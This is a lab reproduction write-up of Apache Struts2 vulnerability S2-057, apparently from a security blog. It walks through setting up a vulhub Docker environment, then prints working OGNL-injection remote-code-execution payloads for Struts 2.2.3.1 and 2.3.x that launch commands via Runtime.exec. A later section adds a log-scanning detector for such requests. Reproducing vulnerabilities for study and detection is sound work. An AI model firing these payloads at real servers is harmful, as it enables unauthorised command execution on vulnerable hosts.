admin

S2-057 Reproduction
2018/08/23


Reproducing st2-057

Reference: Shaoyu's GitHub: https://github.com/jas502n/St2-057

Environment setup

  1. Install Docker and docker-compose
  2. Clone P神's vulhub repository locally: git clone https://github.com/vulhub/vulhub.git
  3. Enter vulhub's struts-048 directory and start the docker image
  4. Download a Struts2 version affected by st2-057:
    mkdir /usr/local/tomcat/webapps/test
    cd /usr/local/tomcat/webapps/test
    wget https://fossies.org/linux/www/legacy/struts-2.5.16-all.zip
    apt-get install unzip -y
    unzip struts-2.5.16-all.zip
    cp struts2-showcase.war /usr/local/tomcat/webapps/
  5. Deploy the war and modify the two struts-actionchaining configuration files:
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/classes/struts-actionchaining.xml
/usr/local/tomcat/webapps/struts2-showcase/WEB-INF/src/java/struts-actionchaining.xml

Change them to:
<struts>
    <package name="actionchaining" extends="struts-default">
        <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
           <result type="redirectAction">
             <param name = "actionName">register2</param>
           </result>
        </action>
    </package>
</struts>
  6. Stop Tomcat and redeploy the docker container

POC verification

Command execution

${(111+111)}/actionChain1.action

Because newer versions of the OGNL package removed CONTEXT_CONTEXT_KEY, CLASS_RESOLVER_CONTEXT_KEY and MEMBER_ACCESS_CONTEXT_KEY from OgnlContext, OGNL expressions can no longer use #context, #_classResolver and #_memberAccess to obtain the corresponding objects.
So at present all POCs only execute on older Struts2 versions; the versions known to work are 2.3 and 2.2.3.1, on which the issue can be reproduced.

2.2.31 POC:
Windows:

http://127.0.0.1:8080/struts3-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec('calc').getInputStream()%2c%23b%3dnew%20java.io.InputStreamReader(%23a)%2c%23c%3dnew %20java.io.BufferedReader(%23b)%2c%23d%3dnew%20char%5b51020%5d%2c%23c.read(%23d)%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23sbtest.println(%23d)%2c%23sbtest.close())%7d/actionChain1.action

Linux:

http://127.0.0.1:8080/struts3-showcase/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/jas502n%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action

2.3.x POC:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}
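The payloads above all share one visible trait: an OGNL expression (`${...}` or `%{...}`, usually percent-encoded) placed in the namespace part of the path, in front of the action name that the redirectAction result then uses. The following detector is an added example written for this post, not code from the page or from the referenced GitHub repository; it scans constructed access-log lines (the log format and addresses are assumptions) and flags requests whose namespace segments contain an OGNL marker after URL-decoding, which is the kind of check a WAF rule or log-review script would apply for S2-057.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined-log style); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2018:10:00:01 +0800] "GET /struts2-showcase/actionchaining/actionChain1.action HTTP/1.1" 302 0
10.0.0.7 - - [23/Aug/2018:10:00:02 +0800] "GET /struts2-showcase/$%7B(111+111)%7D/actionChain1.action HTTP/1.1" 302 0
10.0.0.9 - - [23/Aug/2018:10:00:03 +0800] "GET /struts2-showcase/%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue)%7d/actionChain1.action HTTP/1.1" 500 0
10.0.0.4 - - [23/Aug/2018:10:00:04 +0800] "GET /static/app.css?v=%7Bcache%7D HTTP/1.1" 200 512
"""

# Pulls method and request target out of a combined-log style line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# OGNL expression openers; neither belongs in a Struts namespace segment.
OGNL_MARKER_RE = re.compile(r'[$%]\{')


def decode_path(target):
    """Strip the query string and percent-decode the path twice.

    Decoding twice catches payloads that were percent-encoded and then
    encoded again by a proxy; decoding a clean path a second time is a no-op.
    """
    path = target.split('?', 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def suspicious_namespace(target):
    """Return the first namespace segment containing an OGNL marker, else None.

    Only the segments before the final one are the namespace; the last segment
    is the action name, so it is deliberately excluded from the check.
    """
    segments = decode_path(target).split('/')
    for seg in segments[:-1]:
        if OGNL_MARKER_RE.search(seg):
            return seg
    return None


def scan_log(text):
    """Return (request_target, offending_segment) pairs for suspicious lines."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        seg = suspicious_namespace(m.group('target'))
        if seg is not None:
            hits.append((m.group('target'), seg))
    return hits


if __name__ == '__main__':
    for target, seg in scan_log(SAMPLE_LOG):
        print('OGNL marker in namespace segment %r of request %s' % (seg, target))
```

Running the block reports the two payload-style requests and leaves the normal action request and the CSS request (whose braces sit in the query string, not the path) alone. The check is intentionally narrow: it looks only at namespace segments, because that is the position S2-057 evaluates, so it does not fire on ordinary parameters that happen to contain braces.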

For the root-cause analysis, chybeta's writeup is recommended:
https://xz.aliyun.com/t/2618

Environment setup and reproduction video (popping the calculator was not recorded; you can reproduce it yourself with the POC given on Shaoyu's GitHub):

Link: https://pan.baidu.com/s/16XZGIL65VIs0RKJzA49j8g Password: 2c46

Last modification:September 2nd, 2018 at 08:36 pm